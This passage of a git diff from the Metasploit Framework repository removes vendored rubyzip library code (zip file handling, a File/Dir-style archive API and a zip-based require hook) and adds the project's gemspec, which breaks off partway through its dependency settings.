-    def initialize(fileName, create = nil)
-      super()
-      @name = fileName
-      @comment = ""
-      if (File.exists?(fileName))
-  File.open(name, "rb") { |f| read_from_stream(f) }
-      elsif (create)
-  @entrySet = ZipEntrySet.new
-      else
-  raise ZipError, "File #{fileName} not found"
-      end
-      @create = create
-      @storedEntries = @entrySet.dup
-
-      @restore_ownership = false
-      @restore_permissions = false
-      @restore_times = true
-    end
-
-    # Same as #new. If a block is passed the ZipFile object is passed
-    # to the block and is automatically closed afterwards just as with
-    # ruby's builtin File.open method.
-    def ZipFile.open(fileName, create = nil)
-      zf = ZipFile.new(fileName, create)
-      if block_given?
-  begin
-    yield zf
-  ensure
-    zf.close
-  end
-      else
-  zf
-      end
-    end
-
-    # Returns the zip files comment, if it has one
-    attr_accessor :comment
-
-    # Iterates over the contents of the ZipFile. This is more efficient
-    # than using a ZipInputStream since this methods simply iterates
-    # through the entries in the central directory structure in the archive
-    # whereas ZipInputStream jumps through the entire archive accessing the
-    # local entry headers (which contain the same information as the 
-    # central directory).
-    def ZipFile.foreach(aZipFileName, &block)
-      ZipFile.open(aZipFileName) {
-  |zipFile|
-  zipFile.each(&block)
-      }
-    end
-    
-    # Returns an input stream to the specified entry. If a block is passed
-    # the stream object is passed to the block and the stream is automatically
-    # closed afterwards just as with ruby's builtin File.open method.
-    def get_input_stream(entry, &aProc)
-      get_entry(entry).get_input_stream(&aProc)
-    end
-
-    # Returns an output stream to the specified entry. If a block is passed
-    # the stream object is passed to the block and the stream is automatically
-    # closed afterwards just as with ruby's builtin File.open method.
-    def get_output_stream(entry, &aProc)
-      newEntry = entry.kind_of?(ZipEntry) ? entry : ZipEntry.new(@name, entry.to_s)
-      if newEntry.directory?
-  raise ArgumentError,
-    "cannot open stream to directory entry - '#{newEntry}'"
-      end
-      zipStreamableEntry = ZipStreamableStream.new(newEntry)
-      @entrySet << zipStreamableEntry
-      zipStreamableEntry.get_output_stream(&aProc)      
-    end
-
-    # Returns the name of the zip archive
-    def to_s
-      @name
-    end
-
-    # Returns a string containing the contents of the specified entry
-    def read(entry)
-      get_input_stream(entry) { |is| is.read } 
-    end
-
-    # Convenience method for adding the contents of a file to the archive
-    def add(entry, srcPath, &continueOnExistsProc)
-      continueOnExistsProc ||= proc { false }
-      check_entry_exists(entry, continueOnExistsProc, "add")
-      newEntry = entry.kind_of?(ZipEntry) ? entry : ZipEntry.new(@name, entry.to_s)
-      newEntry.gather_fileinfo_from_srcpath(srcPath)
-      @entrySet << newEntry
-    end
-    
-    # Removes the specified entry.
-    def remove(entry)
-      @entrySet.delete(get_entry(entry))
-    end
-    
-    # Renames the specified entry.
-    def rename(entry, newName, &continueOnExistsProc)
-      foundEntry = get_entry(entry)
-      check_entry_exists(newName, continueOnExistsProc, "rename")
-      @entrySet.delete(foundEntry)
-      foundEntry.name = newName
-      @entrySet << foundEntry
-    end
-
-    # Replaces the specified entry with the contents of srcPath (from 
-    # the file system).
-    def replace(entry, srcPath)
-      check_file(srcPath)
-      add(remove(entry), srcPath)
-    end
-
-    # Extracts entry to file destPath.
-    def extract(entry, destPath, &onExistsProc)
-      onExistsProc ||= proc { false }
-      foundEntry = get_entry(entry)
-      foundEntry.extract(destPath, &onExistsProc)
-    end
-
-    # Commits changes that has been made since the previous commit to 
-    # the zip archive.
-    def commit
-     return if ! commit_required?
-      on_success_replace(name) {
-  |tmpFile|
-  ZipOutputStream.open(tmpFile) {
-    |zos|
-
-    @entrySet.each { |e| e.write_to_zip_output_stream(zos) }
-    zos.comment = comment
-  }
-  true
-      }
-      initialize(name)
-    end
-
-    # Closes the zip file committing any changes that has been made.
-    def close
-      commit
-    end
-
-    # Returns true if any changes has been made to this archive since
-    # the previous commit
-    def commit_required?
-      return @entrySet != @storedEntries || @create == ZipFile::CREATE
-    end
-
-    # Searches for entry with the specified name. Returns nil if 
-    # no entry is found. See also get_entry
-    def find_entry(entry)
-      @entrySet.detect { 
-  |e| 
-  e.name.sub(/\/$/, "") == entry.to_s.sub(/\/$/, "")
-      }
-    end
-
-    # Searches for an entry just as find_entry, but throws Errno::ENOENT
-    # if no entry is found.
-    def get_entry(entry)
-      selectedEntry = find_entry(entry)
-      unless selectedEntry
-  raise Errno::ENOENT, entry
-      end
-      selectedEntry.restore_ownership = @restore_ownership
-      selectedEntry.restore_permissions = @restore_permissions
-      selectedEntry.restore_times = @restore_times
-
-      return selectedEntry
-    end
-
-    # Creates a directory
-    def mkdir(entryName, permissionInt = 0755)
-      if find_entry(entryName)
-        raise Errno::EEXIST, "File exists - #{entryName}"
-      end
-      @entrySet << ZipStreamableDirectory.new(@name, entryName.to_s.ensure_end("/"), nil, permissionInt)
-    end
-
-    private
-
-    def is_directory(newEntry, srcPath)
-      srcPathIsDirectory = File.directory?(srcPath)
-      if newEntry.is_directory && ! srcPathIsDirectory
-  raise ArgumentError,
-    "entry name '#{newEntry}' indicates directory entry, but "+
-    "'#{srcPath}' is not a directory"
-      elsif ! newEntry.is_directory && srcPathIsDirectory
-  newEntry.name += "/"
-      end
-      return newEntry.is_directory && srcPathIsDirectory
-    end
-
-    def check_entry_exists(entryName, continueOnExistsProc, procedureName)
-      continueOnExistsProc ||= proc { false }
-      if @entrySet.detect { |e| e.name == entryName }
-  if continueOnExistsProc.call
-    remove get_entry(entryName)
-  else
-    raise ZipEntryExistsError, 
-      procedureName+" failed. Entry #{entryName} already exists"
-  end
-      end
-    end
-
-    def check_file(path)
-      unless File.readable? path
-  raise Errno::ENOENT, path
-      end
-    end
-    
-    def on_success_replace(aFilename)
-      tmpfile = get_tempfile
-      tmpFilename = tmpfile.path
-      tmpfile.close
-      if yield tmpFilename
-  File.rename(tmpFilename, name)
-      end
-    end
-    
-    def get_tempfile
-      tempFile = Tempfile.new(File.basename(name), File.dirname(name))
-      tempFile.binmode
-      tempFile
-    end
-    
-  end
-
-  class ZipStreamableDirectory < ZipEntry
-    def initialize(zipfile, entry, srcPath = nil, permissionInt = nil)
-      super(zipfile, entry)
-
-      @ftype = :directory
-      entry.get_extra_attributes_from_path(srcPath) if (srcPath)
-      @unix_perms = permissionInt if (permissionInt)
-    end
-  end
-
-  class ZipStreamableStream < DelegateClass(ZipEntry) #nodoc:all
-    def initialize(entry)
-      super(entry)
-      @tempFile = Tempfile.new(File.basename(name), File.dirname(zipfile))
-      @tempFile.binmode
-    end
-
-    def get_output_stream
-      if block_given?
-        begin
-          yield(@tempFile)
-        ensure
-          @tempFile.close
-        end
-      else
-        @tempFile
-      end
-    end
-
-    def get_input_stream
-      if ! @tempFile.closed?
-        raise StandardError, "cannot open entry for reading while its open for writing - #{name}"
-      end
-      @tempFile.open # reopens tempfile from top
-      @tempFile.binmode
-      if block_given?
-        begin
-          yield(@tempFile)
-        ensure
-          @tempFile.close
-        end
-      else
-        @tempFile
-      end
-    end
-    
-    def write_to_zip_output_stream(aZipOutputStream)
-      aZipOutputStream.put_next_entry(self)
-      get_input_stream { |is| IOExtras.copy_stream(aZipOutputStream, is) } 
-    end
-  end
-
-  class ZipExtraField < Hash
-    ID_MAP = {}
-
-    # Meta class for extra fields
-    class Generic
-      def self.register_map
-        if self.const_defined?(:HEADER_ID)
-          ID_MAP[self.const_get(:HEADER_ID)] = self
-        end
-      end
-
-      def self.name
-        self.to_s.split("::")[-1]
-      end
-
-      # return field [size, content] or false
-      def initial_parse(binstr)
-        if ! binstr
-          # If nil, start with empty.
-          return false
-        elsif binstr[0,2] != self.class.const_get(:HEADER_ID)
-          $stderr.puts "Warning: weired extra feild header ID. skip parsing"
-          return false
-        end
-        [binstr[2,2].unpack("v")[0], binstr[4..-1]]
-      end
-
-      def ==(other)
-        self.class != other.class and return false
-        each { |k, v|
-          v != other[k] and return false
-        }
-        true
-      end
-
-      def to_local_bin
-        s = pack_for_local
-        self.class.const_get(:HEADER_ID) + [s.length].pack("v") + s
-      end
-
-      def to_c_dir_bin
-        s = pack_for_c_dir
-        self.class.const_get(:HEADER_ID) + [s.length].pack("v") + s
-      end
-    end
-
-    # Info-ZIP Additional timestamp field
-    class UniversalTime < Generic
-      HEADER_ID = "UT"
-      register_map
-
-      def initialize(binstr = nil)
-        @ctime = nil
-        @mtime = nil
-        @atime = nil
-        @flag  = nil
-        binstr and merge(binstr)
-      end
-      attr_accessor :atime, :ctime, :mtime, :flag
-
-      def merge(binstr)
-        binstr == "" and return
-        size, content = initial_parse(binstr)
-        size or return
-        @flag, mtime, atime, ctime = content.unpack("CVVV")
-        mtime and @mtime ||= Time.at(mtime)
-        atime and @atime ||= Time.at(atime)
-        ctime and @ctime ||= Time.at(ctime)
-      end
-
-      def ==(other)
-        @mtime == other.mtime &&
-        @atime == other.atime &&
-        @ctime == other.ctime
-      end
-
-      def pack_for_local
-        s = [@flag].pack("C")
-        @flag & 1 != 0 and s << [@mtime.to_i].pack("V")
-        @flag & 2 != 0 and s << [@atime.to_i].pack("V")
-        @flag & 4 != 0 and s << [@ctime.to_i].pack("V")
-        s
-      end
-
-      def pack_for_c_dir
-        s = [@flag].pack("C")
-        @flag & 1 == 1 and s << [@mtime.to_i].pack("V")
-        s
-      end
-    end
-
-    # Info-ZIP Extra for UNIX uid/gid
-    class IUnix < Generic
-      HEADER_ID = "Ux"
-      register_map
-
-      def initialize(binstr = nil)
-        @uid = 0
-        @gid = 0
-        binstr and merge(binstr)
-      end
-      attr_accessor :uid, :gid
-
-      def merge(binstr)
-        binstr == "" and return
-        size, content = initial_parse(binstr)
-        # size: 0 for central direcotry. 4 for local header
-        return if(! size || size == 0)
-        uid, gid = content.unpack("vv")
-        @uid ||= uid
-        @gid ||= gid
-      end
-
-      def ==(other)
-        @uid == other.uid &&
-        @gid == other.gid
-      end
-
-      def pack_for_local
-        [@uid, @gid].pack("vv")
-      end
-
-      def pack_for_c_dir
-        ""
-      end
-    end
-
-    ## start main of ZipExtraField < Hash
-    def initialize(binstr = nil)
-      binstr and merge(binstr)
-    end
-
-    def merge(binstr)
-      binstr == "" and return
-      i = 0 
-      while i < binstr.length
-        id = binstr[i,2]
-        len = binstr[i+2,2].to_s.unpack("v")[0] 
-        if id && ID_MAP.member?(id)
-          field_name = ID_MAP[id].name
-          if self.member?(field_name)
-            self[field_name].mergea(binstr[i, len+4])
-          else
-            field_obj = ID_MAP[id].new(binstr[i, len+4])
-            self[field_name] = field_obj
-          end
-        elsif id
-          unless self["Unknown"]
-            s = ""
-            class << s
-              alias_method :to_c_dir_bin, :to_s
-              alias_method :to_local_bin, :to_s
-            end
-            self["Unknown"] = s
-          end
-          if ! len || len+4 > binstr[i..-1].length
-            self["Unknown"] << binstr[i..-1]
-            break;
-          end
-          self["Unknown"] << binstr[i, len+4]
-        end
-        i += len+4
-      end
-    end
-
-    def create(name)
-      field_class = nil
-      ID_MAP.each { |id, klass|
-        if klass.name == name
-          field_class = klass
-          break
-        end
-      }
-      if ! field_class
-  raise ZipError, "Unknown extra field '#{name}'"
-      end
-      self[name] = field_class.new()
-    end
-
-    def to_local_bin
-      s = ""
-      each { |k, v|
-        s << v.to_local_bin
-      }
-      s
-    end
-    alias :to_s :to_local_bin
-
-    def to_c_dir_bin
-      s = ""
-      each { |k, v|
-        s << v.to_c_dir_bin
-      }
-      s
-    end
-
-    def c_dir_length
-      to_c_dir_bin.length
-    end
-    def local_length
-      to_local_bin.length
-    end
-    alias :c_dir_size :c_dir_length
-    alias :local_size :local_length
-    alias :length     :local_length
-    alias :size       :local_length
-  end # end ZipExtraField
-
-end # Zip namespace module
-
-
-
-# Copyright (C) 2002, 2003 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/zipfilesystem.rb b/lib/zip/zipfilesystem.rb
deleted file mode 100644
index 565ce2b3a0..0000000000
--- a/lib/zip/zipfilesystem.rb
+++ /dev/null
@@ -1,611 +0,0 @@
-# encoding: ASCII-8BIT
-require 'zip/zip'
-
-module Zip
-
-  # The ZipFileSystem API provides an API for accessing entries in 
-  # a zip archive that is similar to ruby's builtin File and Dir 
-  # classes.
-  #
-  # Requiring 'zip/zipfilesystem' includes this module in ZipFile
-  # making the methods in this module available on ZipFile objects.
-  #
-  # Using this API the following example creates a new zip file 
-  # <code>my.zip</code> containing a normal entry with the name
-  # <code>first.txt</code>, a directory entry named <code>mydir</code>
-  # and finally another normal entry named <code>second.txt</code>
-  #
-  #   require 'zip/zipfilesystem'
-  #   
-  #   Zip::ZipFile.open("my.zip", Zip::ZipFile::CREATE) {
-  #     |zipfile|
-  #     zipfile.file.open("first.txt", "w") { |f| f.puts "Hello world" }
-  #     zipfile.dir.mkdir("mydir")
-  #     zipfile.file.open("mydir/second.txt", "w") { |f| f.puts "Hello again" }
-  #   }
-  #
-  # Reading is as easy as writing, as the following example shows. The 
-  # example writes the contents of <code>first.txt</code> from zip archive
-  # <code>my.zip</code> to standard out.
-  #
-  #   require 'zip/zipfilesystem'
-  #   
-  #   Zip::ZipFile.open("my.zip") {
-  #     |zipfile|
-  #     puts zipfile.file.read("first.txt")
-  #   }
-
-  module ZipFileSystem
-
-    def initialize # :nodoc:
-      mappedZip = ZipFileNameMapper.new(self)
-      @zipFsDir  = ZipFsDir.new(mappedZip)
-      @zipFsFile = ZipFsFile.new(mappedZip)
-      @zipFsDir.file = @zipFsFile
-      @zipFsFile.dir = @zipFsDir
-    end
-
-    # Returns a ZipFsDir which is much like ruby's builtin Dir (class)
-    # object, except it works on the ZipFile on which this method is
-    # invoked
-    def dir
-      @zipFsDir
-    end
-    
-    # Returns a ZipFsFile which is much like ruby's builtin File (class)
-    # object, except it works on the ZipFile on which this method is
-    # invoked
-    def file
-      @zipFsFile
-    end
-
-    # Instances of this class are normally accessed via the accessor
-    # ZipFile::file. An instance of ZipFsFile behaves like ruby's
-    # builtin File (class) object, except it works on ZipFile entries.
-    #
-    # The individual methods are not documented due to their
-    # similarity with the methods in File
-    class ZipFsFile
-
-      attr_writer :dir
-#      protected :dir
-
-      class ZipFsStat
-        def initialize(zipFsFile, entryName)
-          @zipFsFile = zipFsFile
-          @entryName = entryName
-        end
-        
-        def forward_invoke(msg)
-          @zipFsFile.send(msg, @entryName)
-        end
-
-        def kind_of?(t)
-          super || t == ::File::Stat 
-        end
-        
-        forward_message :forward_invoke, :file?, :directory?, :pipe?, :chardev?
-        forward_message :forward_invoke, :symlink?, :socket?, :blockdev?
-        forward_message :forward_invoke, :readable?, :readable_real?
-        forward_message :forward_invoke, :writable?, :writable_real?
-        forward_message :forward_invoke, :executable?, :executable_real?
-        forward_message :forward_invoke, :sticky?, :owned?, :grpowned?
-        forward_message :forward_invoke, :setuid?, :setgid?
-        forward_message :forward_invoke, :zero?
-        forward_message :forward_invoke, :size, :size?
-        forward_message :forward_invoke, :mtime, :atime, :ctime
-        
-        def blocks; nil; end
-
-        def get_entry
-          @zipFsFile.__send__(:get_entry, @entryName)
-        end
-        private :get_entry
-
-        def gid
-          e = get_entry
-          if e.extra.member? "IUnix"
-            e.extra["IUnix"].gid || 0
-          else
-            0
-          end
-        end
-
-        def uid
-          e = get_entry
-          if e.extra.member? "IUnix"
-            e.extra["IUnix"].uid || 0
-          else
-            0
-          end
-        end
-
-        def ino; 0; end
-
-        def dev; 0; end
-
-        def rdev; 0; end
-
-        def rdev_major; 0; end
-
-        def rdev_minor; 0; end
-
-        def ftype
-          if file?
-            return "file"
-          elsif directory?
-            return "directory"
-          else
-            raise StandardError, "Unknown file type"
-          end
-        end
-
-        def nlink; 1; end
-        
-        def blksize; nil; end
-
-        def mode
-          e = get_entry
-          if e.fstype == 3
-            e.externalFileAttributes >> 16
-          else
-            33206 # 33206 is equivalent to -rw-rw-rw-
-          end
-        end
-      end
-
-      def initialize(mappedZip)
-  @mappedZip = mappedZip
-      end
-
-      def get_entry(fileName)
-        if ! exists?(fileName)
-          raise Errno::ENOENT, "No such file or directory - #{fileName}"
-        end
-        @mappedZip.find_entry(fileName)
-      end
-      private :get_entry
-
-      def unix_mode_cmp(fileName, mode)
-        begin
-          e = get_entry(fileName)
-          e.fstype == 3 && ((e.externalFileAttributes >> 16) & mode ) != 0
-        rescue Errno::ENOENT
-          false
-        end
-      end
-      private :unix_mode_cmp
-      
-      def exists?(fileName)
-        expand_path(fileName) == "/" || @mappedZip.find_entry(fileName) != nil
-      end
-      alias :exist? :exists?
-      
-      # Permissions not implemented, so if the file exists it is accessible
-      alias owned?           exists?
-      alias grpowned?        exists?
-
-      def readable?(fileName)
-        unix_mode_cmp(fileName, 0444)
-      end
-      alias readable_real?   readable?
-
-      def writable?(fileName)
-        unix_mode_cmp(fileName, 0222)
-      end
-      alias writable_real?   writable?
-
-      def executable?(fileName)
-        unix_mode_cmp(fileName, 0111)
-      end
-      alias executable_real? executable?
-
-      def setuid?(fileName)
-        unix_mode_cmp(fileName, 04000)
-      end
-
-      def setgid?(fileName)
-        unix_mode_cmp(fileName, 02000)
-      end
-      
-      def sticky?(fileName)
-        unix_mode_cmp(fileName, 01000)
-      end
-
-      def umask(*args)
-        ::File.umask(*args)
-      end
-
-      def truncate(fileName, len)
-        raise StandardError, "truncate not supported"
-      end
-
-      def directory?(fileName)
-  entry = @mappedZip.find_entry(fileName)
-  expand_path(fileName) == "/" || (entry != nil && entry.directory?)
-      end
-      
-      def open(fileName, openMode = "r", &block)
-        openMode.gsub!("b", "") # ignore b option
-        case openMode
-        when "r" 
-          @mappedZip.get_input_stream(fileName, &block)
-        when "w"
-          @mappedZip.get_output_stream(fileName, &block)
-        else
-          raise StandardError, "openmode '#{openMode} not supported" unless openMode == "r"
-        end
-      end
-
-      def new(fileName, openMode = "r")
-  open(fileName, openMode)
-      end
-      
-      def size(fileName)
-  @mappedZip.get_entry(fileName).size
-      end
-      
-      # Returns nil for not found and nil for directories
-      def size?(fileName)
-  entry = @mappedZip.find_entry(fileName)
-  return (entry == nil || entry.directory?) ? nil : entry.size
-      end
-      
-      def chown(ownerInt, groupInt, *filenames)
-        filenames.each { |fileName|
-          e = get_entry(fileName)
-          unless e.extra.member?("IUnix")
-            e.extra.create("IUnix")
-          end
-          e.extra["IUnix"].uid = ownerInt
-          e.extra["IUnix"].gid = groupInt
-        }
-        filenames.size
-      end
-
-      def chmod (modeInt, *filenames)
-        filenames.each { |fileName|
-          e = get_entry(fileName)
-          e.fstype = 3 # force convertion filesystem type to unix
-          e.externalFileAttributes = modeInt << 16
-        }
-        filenames.size
-      end
-
-      def zero?(fileName)
-  sz = size(fileName)
-  sz == nil || sz == 0
-      rescue Errno::ENOENT
-  false
-      end
-      
-      def file?(fileName)
-  entry = @mappedZip.find_entry(fileName)
-  entry != nil && entry.file?
-      end      
-      
-      def dirname(fileName)
-  ::File.dirname(fileName)
-      end
-      
-      def basename(fileName)
-  ::File.basename(fileName)
-      end
-      
-      def split(fileName)
-  ::File.split(fileName)
-      end
-      
-      def join(*fragments)
-  ::File.join(*fragments)
-      end
-      
-      def utime(modifiedTime, *fileNames)
-        fileNames.each { |fileName|
-          get_entry(fileName).time = modifiedTime
-        }
-      end
-
-      def mtime(fileName)
-  @mappedZip.get_entry(fileName).mtime
-      end
-      
-      def atime(fileName)
-        e = get_entry(fileName)
-        if e.extra.member? "UniversalTime"
-          e.extra["UniversalTime"].atime
-        else
-          nil
-        end
-      end
-      
-      def ctime(fileName)
-        e = get_entry(fileName)
-        if e.extra.member? "UniversalTime"
-          e.extra["UniversalTime"].ctime
-        else
-          nil
-        end
-      end
-
-      def pipe?(filename)
-  false
-      end
-      
-      def blockdev?(filename)
-  false
-      end
-      
-      def chardev?(filename)
-  false
-      end
-      
-      def symlink?(fileName)
-  false
-      end
-      
-      def socket?(fileName)
-  false
-      end
-      
-      def ftype(fileName)
-  @mappedZip.get_entry(fileName).directory? ? "directory" : "file"
-      end
-      
-      def readlink(fileName)
-  raise NotImplementedError, "The readlink() function is not implemented"
-      end
-      
-      def symlink(fileName, symlinkName)
-  raise NotImplementedError, "The symlink() function is not implemented"
-      end
-
-      def link(fileName, symlinkName)
-  raise NotImplementedError, "The link() function is not implemented"
-      end
-
-      def pipe
-  raise NotImplementedError, "The pipe() function is not implemented"
-      end
-
-      def stat(fileName)
-        if ! exists?(fileName)
-          raise Errno::ENOENT, fileName
-        end
-        ZipFsStat.new(self, fileName)
-      end
-
-      alias lstat stat
-
-      def readlines(fileName)
-  open(fileName) { |is| is.readlines }
-      end
-
-      def read(fileName)
-        @mappedZip.read(fileName)
-      end
-
-      def popen(*args, &aProc)
-  File.popen(*args, &aProc)
-      end
-
-      def foreach(fileName, aSep = $/, &aProc)
-  open(fileName) { |is| is.each_line(aSep, &aProc) }
-      end
-
-      def delete(*args)
-  args.each { 
-    |fileName|
-    if directory?(fileName)
-      raise Errno::EISDIR, "Is a directory - \"#{fileName}\""
-    end
-    @mappedZip.remove(fileName) 
-  }
-      end
-
-      def rename(fileToRename, newName)
-        @mappedZip.rename(fileToRename, newName) { true }
-      end
-
-      alias :unlink :delete
-
-      def expand_path(aPath)
-        @mappedZip.expand_path(aPath)
-      end
-    end
-
-    # Instances of this class are normally accessed via the accessor
-    # ZipFile::dir. An instance of ZipFsDir behaves like ruby's
-    # builtin Dir (class) object, except it works on ZipFile entries.
-    #
-    # The individual methods are not documented due to their
-    # similarity with the methods in Dir
-    class ZipFsDir
-      
-      def initialize(mappedZip)
-        @mappedZip = mappedZip
-      end
-      
-      attr_writer :file
-
-      def new(aDirectoryName)
-        ZipFsDirIterator.new(entries(aDirectoryName))
-      end
-
-      def open(aDirectoryName)
-        dirIt = new(aDirectoryName)
-        if block_given?
-          begin
-            yield(dirIt)
-            return nil
-          ensure
-            dirIt.close
-          end
-        end
-        dirIt
-      end
-
-      def pwd; @mappedZip.pwd; end
-      alias getwd pwd
-      
-      def chdir(aDirectoryName)
-        unless @file.stat(aDirectoryName).directory?
-          raise Errno::EINVAL, "Invalid argument - #{aDirectoryName}"
-        end
-        @mappedZip.pwd = @file.expand_path(aDirectoryName)
-      end
-      
-      def entries(aDirectoryName)
-        entries = []
-        foreach(aDirectoryName) { |e| entries << e }
-        entries
-      end
-
-      def foreach(aDirectoryName)
-        unless @file.stat(aDirectoryName).directory?
-          raise Errno::ENOTDIR, aDirectoryName
-        end
-        path = @file.expand_path(aDirectoryName).ensure_end("/")
-
-        subDirEntriesRegex = Regexp.new("^#{path}([^/]+)$")
-        @mappedZip.each { 
-          |fileName|
-          match = subDirEntriesRegex.match(fileName)
-          yield(match[1]) unless match == nil
-        }
-      end
-
-      def delete(entryName)
-        unless @file.stat(entryName).directory?
-          raise Errno::EINVAL, "Invalid argument - #{entryName}"
-        end
-        @mappedZip.remove(entryName)
-      end
-      alias rmdir  delete
-      alias unlink delete
-      
-      def mkdir(entryName, permissionInt = 0755)
-        @mappedZip.mkdir(entryName, permissionInt)
-      end
-      
-      def chroot(*args)
-      	raise NotImplementedError, "The chroot() function is not implemented"
-      end
-
-    end
-
-    class ZipFsDirIterator # :nodoc:all
-      include Enumerable
-
-      def initialize(arrayOfFileNames)
-        @fileNames = arrayOfFileNames
-        @index = 0
-      end
-
-      def close
-        @fileNames = nil
-      end
-
-      def each(&aProc)
-        raise IOError, "closed directory" if @fileNames == nil
-        @fileNames.each(&aProc)
-      end
-
-      def read
-        raise IOError, "closed directory" if @fileNames == nil
-        @fileNames[(@index+=1)-1]
-      end
-
-      def rewind
-        raise IOError, "closed directory" if @fileNames == nil
-        @index = 0
-      end
-
-      def seek(anIntegerPosition)
-        raise IOError, "closed directory" if @fileNames == nil
-        @index = anIntegerPosition
-      end
-
-      def tell
-        raise IOError, "closed directory" if @fileNames == nil
-        @index
-      end
-    end
-
-    # All access to ZipFile from ZipFsFile and ZipFsDir goes through a
-    # ZipFileNameMapper, which has one responsibility: ensure
-    class ZipFileNameMapper # :nodoc:all
-      include Enumerable
-
-      def initialize(zipFile)
-        @zipFile = zipFile
-        @pwd = "/"
-      end
-      
-      attr_accessor :pwd
-      
-      def find_entry(fileName)
-        @zipFile.find_entry(expand_to_entry(fileName))
-      end
-      
-      def get_entry(fileName)
-        @zipFile.get_entry(expand_to_entry(fileName))
-      end
-
-      def get_input_stream(fileName, &aProc)
-        @zipFile.get_input_stream(expand_to_entry(fileName), &aProc)
-      end
-      
-      def get_output_stream(fileName, &aProc)
-        @zipFile.get_output_stream(expand_to_entry(fileName), &aProc)
-      end
-
-      def read(fileName)
-        @zipFile.read(expand_to_entry(fileName))
-      end
-      
-      def remove(fileName)
-        @zipFile.remove(expand_to_entry(fileName))
-      end
-
-      def rename(fileName, newName, &continueOnExistsProc)
-        @zipFile.rename(expand_to_entry(fileName), expand_to_entry(newName), 
-                        &continueOnExistsProc)
-      end
-
-      def mkdir(fileName, permissionInt = 0755)
-        @zipFile.mkdir(expand_to_entry(fileName), permissionInt)
-      end
-
-      # Turns entries into strings and adds leading /
-      # and removes trailing slash on directories
-      def each
-        @zipFile.each {
-          |e|
-          yield("/"+e.to_s.chomp("/"))
-        }
-      end
-      
-      def expand_path(aPath)
-        expanded = aPath.starts_with("/") ? aPath : @pwd.ensure_end("/") + aPath
-        expanded.gsub!(/\/\.(\/|$)/, "")
-        expanded.gsub!(/[^\/]+\/\.\.(\/|$)/, "")
-        expanded.empty? ? "/" : expanded
-      end
-
-      private
-
-      def expand_to_entry(aPath)
-        expand_path(aPath).lchop
-      end
-    end
-  end
-
-  class ZipFile
-    include ZipFileSystem
-  end
-end
-
-# Copyright (C) 2002, 2003 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/ziprequire.rb b/lib/zip/ziprequire.rb
deleted file mode 100644
index a3b1261c20..0000000000
--- a/lib/zip/ziprequire.rb
+++ /dev/null
@@ -1,90 +0,0 @@
-# With ziprequire you can load ruby modules from a zip file. This means
-# ruby's module include path can include zip-files.
-#
-# The following example creates a zip file with a single entry 
-# <code>log/simplelog.rb</code> that contains a single function 
-# <code>simpleLog</code>: 
-#
-#   require 'zip/zipfilesystem'
-#   
-#   Zip::ZipFile.open("my.zip", true) {
-#     |zf| 
-#     zf.file.open("log/simplelog.rb", "w") { 
-#       |f|
-#       f.puts "def simpleLog(v)"
-#       f.puts '  Kernel.puts "INFO: #{v}"'
-#       f.puts "end"
-#     }
-#   }
-#
-# To use the ruby module stored in the zip archive simply require
-# <code>zip/ziprequire</code> and include the <code>my.zip</code> zip 
-# file in the module search path. The following command shows one 
-# way to do this:
-#
-#   ruby -rzip/ziprequire -Imy.zip  -e " require 'log/simplelog'; simpleLog 'Hello world' "
-
-#$: << 'data/rubycode.zip' << 'data/rubycode2.zip'
-
-
-require 'zip/zip'
-
-class ZipList #:nodoc:all
-  def initialize(zipFileList)
-      @zipFileList = zipFileList
-  end
-
-  def get_input_stream(entry, &aProc)
-    @zipFileList.each {
-      |zfName|
-      Zip::ZipFile.open(zfName) {
-  |zf|
-  begin
-    return zf.get_input_stream(entry, &aProc) 
-  rescue Errno::ENOENT
-  end
-      }
-    }
-    raise Errno::ENOENT,
-      "No matching entry found in zip files '#{@zipFileList.join(', ')}' "+
-      " for '#{entry}'"
-  end
-end
-
-
-module Kernel #:nodoc:all
-  alias :oldRequire :require
-
-  def require(moduleName)
-    zip_require(moduleName) || oldRequire(moduleName)
-  end
-
-  def zip_require(moduleName)
-    return false if already_loaded?(moduleName)
-    get_resource(ensure_rb_extension(moduleName)) { 
-      |zis| 
-      eval(zis.read); $" << moduleName 
-    }
-    return true
-  rescue Errno::ENOENT => ex
-    return false
-  end
-
-  def get_resource(resourceName, &aProc)
-    zl = ZipList.new($:.grep(/\.zip$/))
-    zl.get_input_stream(resourceName, &aProc)
-  end
-
-  def already_loaded?(moduleName)
-    moduleRE = Regexp.new("^"+moduleName+"(\.rb|\.so|\.dll|\.o)?$")
-    $".detect { |e| e =~ moduleRE } != nil
-  end
-
-  def ensure_rb_extension(aString)
-    aString.sub(/(\.rb)?$/i, ".rb")
-  end
-end
-
-# Copyright (C) 2002 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
new file mode 100644
index 0000000000..6999c787e3
--- /dev/null
+++ b/metasploit-framework.gemspec
@@ -0,0 +1,83 @@
+# coding: utf-8
+
+# During build, the Gemfile is temporarily moved and
+# we must manually define the project root
+if ENV['MSF_ROOT']
+  lib = File.realpath(File.expand_path('lib', ENV['MSF_ROOT']))
+else
+  # have to use realpath as metasploit-framework is often loaded through a symlink and tools like Coverage and debuggers
+  # require realpaths.
+  lib = File.realpath(File.expand_path('../lib', __FILE__))
+end
+
+$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
+require 'metasploit/framework/version'
+
+Gem::Specification.new do |spec|
+  spec.name          = 'metasploit-framework'
+  spec.version       = Metasploit::Framework::GEM_VERSION
+  spec.authors       = ['Metasploit Hackers']
+  spec.email         = ['metasploit-hackers@lists.sourceforge.net']
+  spec.summary       = 'metasploit-framework'
+  spec.description   = 'metasploit-framework'
+  spec.homepage      = 'https://www.metasploit.com'
+  spec.license       = 'BSD-3-clause'
+
+  spec.files         = `git ls-files`.split($/).reject { |file|
+    file =~ /^config/
+  }
+  spec.bindir = '.'
+  spec.executables   = [
+      'msfbinscan',
+      'msfcli',
+      'msfconsole',
+      'msfd',
+      'msfelfscan',
+      'msfencode',
+      'msfmachscan',
+      'msfpayload',
+      'msfpescan',
+      'msfrop',
+      'msfrpc',
+      'msfrpcd',
+      'msfupdate',
+      'msfvenom'
+  ]
+  spec.test_files    = spec.files.grep(%r{^spec/})
+  spec.require_paths = ["lib"]
+
+  # The Metasploit ecosystem is not ready for Rails 4 as it uses features of Rails 3.X that are removed in Rails 4.
+  rails_version_constraint = '< 4.0.0'
